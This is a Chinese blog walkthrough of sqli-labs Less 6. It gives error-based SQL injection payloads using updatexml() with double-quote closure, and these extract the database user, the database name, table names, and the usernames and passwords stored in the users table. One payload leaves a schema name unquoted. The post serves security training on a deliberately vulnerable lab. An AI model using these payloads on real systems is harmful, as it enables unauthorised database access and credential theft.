sqli-labs系列——第六关

2023-11-21 21:16:34

less6

 

这个本质上跟第五关相同都是使用报错注入,这一关使用的是双引号闭合

 

还是使用updatexml()这个函数

?id=1" union select updatexml(1,concat(0x7e,(select user()),0x7e),1)--+

 

sqli-labs系列——第六关

 

爆库名:

?id=1" union select updatexml(1,concat(0x7e,(select database()),0x7e),1)--+

 

sqli-labs系列——第六关

 

爆表名:

?id=1" union select updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = security limit 0,1),0x7e),1) --+

 

sqli-labs系列——第六关

 

爆用户名:

?id=1" union select updatexml(1,concat(0x7e,(select group_concat(username) from users),0x7e),1) --+

 

sqli-labs系列——第六关

 

爆密码:

?id=1" union select updatexml(1,concat(0x7e,(select group_concat(password) from users),0x7e),1) --+

 

sqli-labs系列——第六关

sqli-labs系列——第六关

上一篇:MySQL Visual Studio Cannot create a design window for the selected object 解决方法


下一篇:Spring+myabtis整合声明式事务异常之org.springframework.transaction.TransactionTimedOutException: Transaction ..